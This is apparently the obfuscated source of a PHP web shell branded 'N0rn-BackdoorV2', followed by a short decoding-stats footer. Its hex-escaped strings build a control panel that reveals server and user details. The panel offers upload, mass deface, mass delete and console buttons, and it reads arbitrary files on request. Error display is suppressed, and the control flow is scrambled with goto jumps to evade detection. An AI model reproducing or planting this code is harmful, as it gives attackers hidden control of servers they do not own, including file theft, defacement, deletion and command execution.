"\12\x9\x9\x3c\57\x64\x69\166\x3e\xa\x9\74\x2f\x64\151\x76\x3e\xa\74\x2f\x64\x69\x76\x3e\xa\xa\74\144\151\166\x20\x63\x6c\141\163\x73\75\x27\x63\x6f\156\164\x61\x69\x6e\145\x72\55\x66\x6c\x75\x69\144\47\76\12\11\x3c\x64\151\166\x20\143\154\x61\x73\163\x3d\x27\142\x6f\170\x20\x73\150\x61\144\x6f\x77\x20\142\x67\55\x64\141\x72\x6b\x20\x70\55\64\40\162\x6f\165\x6e\144\145\144\55\63\40\155\x62\x2d\63\x27\x3e\12\11\x9\x3c\144\x69\x76\40\x63\154\x61\x73\x73\x3d\x27\143\157\x72\156\145\x72\x20\141\x6e\165\47\76\12\11\11\11\74\142\40\x64\x61\164\141\x2d\142\163\x2d\x74\x6f\147\x67\x6c\x65\x3d\47\143\x6f\x6c\x6c\x61\x70\x73\145\47\40\x64\141\x74\x61\55\x62\163\55\164\x61\162\147\145\164\75\47\x23\x63\x6f\154\154\x61\160\x73\x65\105\x78\x61\x6d\160\x6c\x65\47\x20\141\x72\x69\141\55\x65\x78\160\141\x6e\144\x65\144\75\47\x66\141\154\163\145\47\x20\141\162\x69\x61\55\x63\x6f\x6e\164\162\x6f\x6c\163\75\x27\x63\157\x6c\154\141\x70\x73\x65\105\x78\141\155\160\x6c\x65\47\x3e\x3c\151\x20\x63\154\141\x73\x73\x3d\x27\142\x69\40\x62\x69\55\151\156\146\157\55\143\151\x72\143\154\x65\x27\x3e\x3c\57\x69\76\40\111\156\146\157\162\x6d\x61\164\151\157\156\x20\123\145\162\x76\x65\x72\x20\x3c\151\x20\143\x6c\x61\x73\163\x3d\x27\142\151\x20\142\x69\x2d\x63\150\145\166\x72\157\156\55\144\x6f\x77\x6e\x27\x3e\x3c\x2f\151\76\74\x2f\x62\76\xa\x9\11\74\x2f\x64\x69\x76\x3e\12\11\x3c\144\x69\166\40\x63\x6c\141\163\163\75\x27\x63\157\154\154\141\x70\163\145\40\163\x68\x65\x6c\154\40\x6d\142\x2d\63\47\x20\151\144\75\47\x63\157\154\x6c\x61\160\x73\145\x45\170\141\155\x70\154\145\x27\x3e\12\x9\x9\74\144\x69\x76\x20\x63\154\141\163\163\75\x27\x62\x6f\x78\40\x73\150\x61\x64\x6f\167\40\142\147\55\x64\141\162\x6b\40\160\55\x34\40\162\157\165\x6e\x64\145\144\x2d\63\47\76\xa\x9\11\x9\125\156\x61\x6d\x65\x5c\x4b\145\x72\156\145\154\x3a\40\x3c\x67\x72\x3e" . php_uname() . "\74\x2f\x67\162\x3e\x3c\x62\x72\x20\x2f\76\12\x9\x9\x9\123\x65\162\x76\145\x72\x3a\x20\x3c\147\x72\x3e" . $_SERVER["\123\x45\x52\126\x45\x52\x5f\x53\117\106\124\x57\x41\122\105"] . "\74\x2f\147\162\x3e\x3c\142\162\40\x2f\x3e\12\x9\11\x9\120\x48\120\40\126\x65\x72\163\x69\x6f\x6e\x3a\x20\74\x67\x72\76" . PHP_VERSION . "\x3c\57\x67\162\76\40\x3c\x61\x20\x63\x6c\x61\x73\163\75\47\164\145\170\164\x2d\144\145\x63\157\162\x61\164\151\x6f\x6e\x2d\156\157\x6e\x65\40\164\145\170\x74\55\x73\x75\x63\x63\x65\163\163\47\x20\x68\x72\x65\146\x3d\47\x3f\160\x68\x70\151\156\146\157\x26\x70\141\164\150\x3d{$path}\x27\76\133\x20\120\x48\120\40\x49\x4e\106\117\x20\135\74\57\141\76\40\x3c\x62\x72\40\57\x3e\xa\11\x9\11\x4f\160\145\162\141\164\x69\156\147\x20\123\x79\x73\164\145\155\72\x20\x3c\x67\162\76" . PHP_OS . "\x3c\57\x67\x72\x3e\74\x62\162\x20\x2f\x3e\12\11\x9\x9\x53\145\x72\x76\x65\x72\x20\111\x70\x3a\40\x3c\x67\x72\76" . gethostbyname($_SERVER["\110\x54\x54\x50\137\x48\x4f\x53\124"]) . "\x3c\57\147\x72\x3e\x3c\142\x72\40\57\76\12\x9\x9\x9\x59\x6f\165\x72\x20\x49\x70\x3a\40\74\147\162\x3e" . ip() . "\74\57\x67\162\76\74\x62\x72\40\57\x3e\12\x9\x9\11\x44\x61\164\x65\40\124\151\155\145\x3a\40\74\147\x72\76" . date("\131\55\155\x2d\x64\40\110\x3a\151\72\x73") . "\x3c\57\x67\x72\76\74\x62\x72\40\57\x3e\12\x9\11\x9\125\163\x65\x72\x3a\x20\x3c\147\162\x3e{$user}\x3c\x2f\147\x72\x3e\x20\50{$uid}\x29\x20\x7c\x20\107\162\x6f\165\160\72\x20\74\147\x72\x3e{$group}\x3c\57\147\x72\x3e\x20\x28{$gid}\51\x3c\x62\x72\40\57\76\xa\x9\11\11\123\141\x66\145\40\115\157\144\145\x3a\x20{$sm}\74\x62\162\x20\x2f\x3e\xa\x9\11\11\x44\x69\x73\141\x62\154\x65\x20\106\165\156\143\x74\151\x6f\x6e\x3a\40\74\163\160\x61\x6e\x20\x63\x6c\141\x73\163\x3d\x27\142\x6b\x70\40\164\x61\142\x6c\145\x2d\162\x65\x73\x70\157\156\163\151\166\x65\x27\76{$disfc}\x3c\57\163\x70\141\156\x3e\xa\x9\11\x3c\57\144\151\x76\76\12\x9\x3c\x2f\x64\x69\x76\76\xa\74\x64\x69\x76\40\x63\x6c\141\163\x73\75\47\x74\145\170\x74\x2d\x63\145\156\164\x65\x72\x20\155\164\55\62\x27\76\12\11\74\144\151\166\x20\x63\x6c\x61\163\163\75\x27\x62\164\156\x2d\x67\x72\x6f\x75\160\x27\x3e\12\x9\x9\74\141\x20\143\x6c\141\x73\163\x3d\x27\x62\164\156\40\142\164\156\x2d\157\165\164\x6c\x69\x6e\145\55\167\141\162\x6e\151\156\147\40\x62\x74\x6e\x2d\x73\155\x20\x6d\x65\55\x32\47\x20\x68\162\x65\146\x3d\x27\x3f\x75\x70\x6c\x6f\x61\144\46\x70\x61\x74\150\x3d{$path}\47\76\x3c\x69\x20\x63\154\x61\x73\x73\x3d\47\142\x69\40\142\151\x2d\x75\160\x6c\x6f\141\x64\x27\x3e\x3c\57\x69\x3e\40\x55\160\x6c\157\x61\144\x3c\x2f\x61\x3e\12\11\11\x3c\141\x20\143\x6c\x61\163\163\x3d\x27\142\164\156\x20\142\164\156\x2d\157\x75\x74\154\151\x6e\145\55\x77\141\x72\156\x69\x6e\x67\40\142\x74\x6e\x2d\163\x6d\x20\155\145\55\x32\x27\40\150\162\x65\146\75\47\x3f\155\x61\x73\163\x5f\x64\x65\x66\x61\x63\145\x26\x70\141\164\150\x3d{$path}\x27\x3e\x3c\151\x20\x63\154\x61\x73\x73\x3d\47\x62\151\40\x62\x69\x2d\x65\170\x63\x6c\141\155\141\x74\x69\157\156\55\x64\151\141\x6d\x6f\156\x64\47\x3e\74\x2f\x69\76\40\115\x61\163\163\40\104\145\146\x61\x63\145\74\x2f\141\76\12\x9\x9\x3c\141\40\143\x6c\141\x73\163\x3d\47\x62\x74\x6e\x20\x62\x74\156\x2d\x6f\x75\164\x6c\151\156\145\55\167\x61\162\x6e\151\x6e\x67\40\x62\x74\156\55\x73\x6d\40\x6d\x65\55\62\x27\40\150\162\145\146\75\x27\77\155\x61\163\x73\137\x64\145\x6c\145\164\145\x26\160\x61\164\x68\x3d{$path}\x27\x3e\74\151\x20\x63\154\x61\163\163\75\47\142\x69\40\x62\x69\55\164\162\141\x73\x68\47\x3e\x3c\57\x69\x3e\x20\115\x61\x73\x73\40\x44\x65\154\145\x74\x65\74\x2f\141\76\12\11\x9\x3c\x61\40\x63\x6c\141\163\163\x3d\47\x62\x74\x6e\40\x62\x74\156\x2d\x6f\x75\164\154\x69\x6e\x65\55\167\141\x72\156\151\156\x67\x20\142\x74\156\55\x73\155\40\x6d\x65\x2d\x32\x27\40\150\162\x65\x66\x3d\x27\77\143\x6d\144\46\x70\x61\164\150\75{$path}\47\76\x3c\x69\x20\143\154\x61\x73\x73\x3d\47\142\x69\40\x62\x69\x2d\164\x65\x72\x6d\151\x6e\141\x6c\x27\76\x3c\x2f\151\x3e\x20\103\x6f\156\163\x6f\154\145\74\x2f\141\76\12\11\x3c\57\144\x69\x76\76\12\x3c\x2f\x64\x69\x76\x3e"; goto JMbsx; zAXfG: @ini_set("\144\x69\163\160\154\x61\x79\x5f\145\162\162\x6f\162\x73", 0); goto jAGHx; LMVda: if (isset($_GET["\157\160\164\151\x6f\x6e"]) && $_POST["\x6f\160\x74"] == "\144\x6f\167\156\154\x6f\141\144") { header("\x43\x6f\156\164\145\156\x74\55\x74\171\160\x65\x3a\40\x74\x65\170\164\57\x70\154\141\151\x6e"); header("\103\157\156\x74\x65\156\x74\55\x44\151\x73\160\x6f\x73\151\164\x69\x6f\156\72\40\x61\x74\x74\141\x63\150\x6d\145\156\x74\73\x20\x66\151\154\x65\x6e\141\155\145\75\x22" . $_POST["\156\x61\155\x65"] . "\42"); echo file_get_contents($_POST["\160\141\x74\150"]); die; } goto t6Mcd; ICBvw: if (isset($_GET["\x70\x61\164\x68"])) { $path = $_GET["\160\141\164\x68"]; } else { $path = getcwd(); } goto OZEgT; t6Mcd: function pathPattern($path, $p) { if (isset($_GET["\x70\141\x74\150"])) { $pe = $_GET["\160\x61\164\150"]; } else { $pe = getcwd(); } if (is_writable($pe)) { return "\74\147\162\40\x63\154\141\163\x73\75\47\x61\x6e\165\x27\76" . $p . "\74\x2f\147\162\76"; } else { return "\x3c\x72\144\40\x63\154\141\x73\163\75\x27\141\156\165\x27\x3e" . $p . "\74\x2f\162\144\x3e"; } } goto M7nN2; auUCq: ?>
</tbody>
</table>
<div class='nFoot text-center'>© <?php echo " ".date('Y')." $_n";?></div>
<div class="landing-page mt-2">
<ul>
<li>
<a href="" target="_blank"><i class="bi bi-envelope"></i></a>
</li>
<li>
<a href="https://github.com/faizprtsc/N0rn-BackdoorV2" target="_blank"><i class="bi bi-github"></i></a>
</li>
</ul>
</div>
</div>
</div>
</div>
<style>
body {
background: rgb(83, 164, 220);
background: -moz-linear-gradient(90deg, rgba(83, 164, 220, 1) 0%, rgba(164, 53, 205, 1) 100%);
background: -webkit-linear-gradient(90deg, rgba(83, 164, 220, 1) 0%, rgba(164, 53, 205, 1) 100%);
background: linear-gradient(90deg, rgba(83, 164, 220, 1) 0%, rgba(164, 53, 205, 1) 100%);
filter: progid:DXImageTransform.Microsoft.gradient(startColorstr="#53a4dc", endColorstr="#a435cd", GradientType=1);
}
.tw {
display:inline-block;
color: deeppink;
}
.tw > span {
display:grid;
overflow: hidden;
height:1.2em;
}
.tw span span {
width: 0%;
max-width: max-content;
overflow: hidden;
height: inherit;
word-break: break-all;
animation:
c 0.5s infinite steps(1),
t 2s linear infinite alternate,
m 12s steps(3) infinite;
}
.tw span span:before {
content:" ";
display:inline-block;
}
@keyframes t{
90%,100% {width:100%}
}
@keyframes c{
0%,100%{box-shadow:5px 0 0 #0000}
50% {box-shadow:5px 0 0 white}
}
@keyframes m{
100% {transform:translateY(-300%)}
}
.nFoot {
color: #3d86aa;
background-image: -webkit-linear-gradient(0deg, #3d86aa 31%,#ef86de 73%,#29fac1 67%);
background-clip: text;
-webkit-background-clip: text;
-webkit-text-fill-color: transparent;
}
.landing-page {
display: flex;
justify-content: center;
color: #26bd86;
background-image: -webkit-linear-gradient(0deg, #26bd86 42%,#c71cfa 81%);
background-clip: text;
-webkit-background-clip: text;
-webkit-text-fill-color: transparent;
}
.landing-page > ul {
list-style: none;
flex-wrap: wrap;
text-align: center;
display: flex;
}
.landing-page > ul > li > a {
color: white;
font-size: 30px;
margin-right: 25px;
}
</style>
<script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.6.0/prism.js"></script>
<script src="https://cdn.jsdelivr.net/npm/[email protected]/dist/js/bootstrap.bundle.min.js"></script>
<script src="https://code.jquery.com/jquery-3.3.1.slim.min.js"></script>
</body>
</html>Function Calls
| None |
Stats
| MD5 | cd3490c00675a3478f1bdea9e82d762e |
| Eval Count | 0 |
| Decode Time | 135 ms |